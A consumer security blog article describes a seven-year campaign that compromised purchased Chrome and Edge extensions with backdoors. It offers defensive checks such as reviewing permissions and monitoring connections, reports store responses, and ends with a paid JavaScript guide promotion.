7-Year Malicious Campaign Installed Backdoor in Millions of Chrome and Edge Extensions
Hello HaWkers, an alarming discovery was revealed this week in the digital security world. Researchers identified a malicious campaign that operated for 7 years, compromising popular Chrome and Edge extensions with backdoors that potentially affected millions of users.
How many extensions do you have installed in your browser right now? And how many of them did you actually check before installing? This type of attack shows how even tools we consider safe can be threat vectors.
The Discovery
The campaign was recently exposed by security researchers who identified a sophisticated pattern of browser extension compromise. The attack operated silently since 2018, going undetected by all extension store security mechanisms.
How the Attack Worked
The scheme followed a well-structured pattern:
Phase 1: Acquisition
Attackers identified popular extensions whose original developers had lost interest or were willing to sell. Extensions with hundreds of thousands of users were preferred targets.
Phase 2: Malicious Update
After acquiring the extension, an update was released containing obfuscated malicious code. Since users already trusted the extension, the update was installed automatically.
Phase 3: Persistence
The backdoor was designed to be extremely discreet, activating only under specific conditions to avoid detection by security tools and code analysis.
Phase 4: Exfiltration
Once active, the malware could:
- Steal session cookies
- Intercept credentials
- Inject fraudulent ads
- Redirect traffic
- Collect browsing data
Scale of the Problem
Alarming Numbers
The campaign compromised dozens of extensions, including some with:
- Over 1 million active installations
- Positive ratings of 4.5+ stars
- Years of "clean" history
Most affected categories:
| Category | Risk |
|---|---|
| Free VPNs | High |
| Download managers | High |
| Page modifiers | Medium |
| Productivity tools | Medium |
| Themes and customization | Low to Medium |
Why It Lasted So Long
Several factors allowed the campaign to operate for 7 years:
Sophisticated obfuscation
The malicious code was highly obfuscated and fragmented, making detection by static analysis difficult.
Conditional activation
The backdoor was only activated after an "incubation" period and only under certain geographic and usage conditions.
Distributed infrastructure
The command and control (C2) servers used domains that rotated frequently and blended with legitimate traffic.
Reputation purchase
By acquiring already established extensions, attackers inherited all the trust built by the original developer.
How to Check If You Were Affected
Step 1: Review Installed Extensions
In Chrome, go to chrome://extensions/ and in Edge, go to edge://extensions/.
Check:
- Last update date for each extension
- If the developer changed recently
- Permissions requested by the extension
Step 2: Check for Excessive Permissions
Be suspicious of extensions that ask for:
- Read and modify all data on all sites
- Manage downloads
- Modify data sent to servers
- Access tabs and windowsIf a themes extension asks for access to all your browsing data, something is wrong.
Step 3: Use Analysis Tools
There are tools that can help identify potentially malicious extensions:
CRXcavator (for Chrome)
Service that analyzes Chrome extensions and provides risk scores based on permissions and behavior.
Extension Police
Extension that monitors changes in other extensions and alerts about suspicious updates.
Step 4: Monitor Network Traffic
For more technical users, monitoring browser network traffic can reveal suspicious communications:
# Linux/macOS - Monitor Chrome connections
lsof -i -n | grep -i chrome
# Windows PowerShell
Get-NetTCPConnection | Where-Object {$_.OwningProcess -eq (Get-Process chrome).Id}Security Best Practices For Extensions
Before Installing
1. Verify the developer
Research who is behind the extension. Known developers and established companies are more reliable.
2. Analyze permissions
Only install extensions that ask for the minimum permissions necessary to function.
3. Check recent reviews
Old reviews may not reflect the current state of the extension. Focus on comments from recent months.
4. Prefer open source extensions
Open code allows the community to audit security.
After Installing
1. Keep few extensions
The fewer extensions, the smaller the attack surface.
2. Disable when not using
Extensions you rarely use can be disabled and activated only when needed.
3. Review periodically
Every few months, review your extensions and remove ones you no longer use.
Company Response
Google removed the identified extensions from the Chrome Web Store and is working on improvements to review processes:
- More rigorous analysis of updates for extensions that change ownership
- Machine learning to detect suspicious behavior
- Monitoring of extension network communications
Microsoft
Microsoft also took similar actions on the Edge Add-ons store and is implementing:
- Additional checks for extensions that request sensitive permissions
- Better tracking of ownership changes
- Closer collaboration with security researchers
The Extension Ecosystem Needs to Change
Structural Problems
This incident exposes fundamental problems in the current extension distribution model:
Opaque ownership transfer
When an extension changes owners, users are not notified. This allows attackers to buy extensions and turn them into malware.
Automatic updates without review
Extensions can be automatically updated without security review proportional to the number of affected users.
Overly broad permissions
The current permission model is too binary. An extension either has or does not have access to data - there are no intermediate levels.
Proposed Solutions
Researchers and security experts suggest:
Manifest V3
The new version of Chrome's extension manifest already limits some dangerous capabilities, but the transition is slow and controversial.
Ownership change notification
Users should be notified and have the option to review extensions that change developers.
More restrictive sandbox
Extensions should operate in more isolated environments, with granular access only to what they actually need.
Lessons For Developers
If you develop browser extensions, this incident offers important lessons:
Supply Chain Security
Protect your credentials
Developer accounts are valuable targets. Use multi-factor authentication and strong passwords.
Audit dependencies
Extensions using third-party libraries can be compromised indirectly.
Monitor access
Watch for unauthorized access attempts to your developer account.
If You Decide to Sell
If you decide to sell or transfer an extension:
- Consider the impact on users
- Verify the buyer's reputation
- Be transparent with the community about the transfer
Conclusion
The 7-year backdoor campaign in extensions is a stark reminder that digital security requires constant vigilance. Even tools we use daily and consider safe can be compromised.
For users, the recommendation is clear: review your extensions, remove unnecessary ones, and be careful before installing new ones. For developers and technology companies, it is time to rethink how the extension ecosystem works.
If you want to learn more about security in web development, I recommend checking out the article Critical Vulnerability in React and Next.js Allows Remote Code Execution where we discuss another recent threat and how to protect yourself.
Let's go! 🦅
📚 Want to Deepen Your JavaScript Knowledge?
This article covered a critical security topic, but there is much more to learn about secure and modern development.
Developers who invest in solid, structured knowledge tend to have more opportunities in the market.
Complete Study Material
If you want to master JavaScript from basics to advanced, I have prepared a complete guide:
Investment options:
- 1x of $4.90 on card
- or $4.90 at sight
👉 Learn About JavaScript Guide
💡 Material updated with industry best practices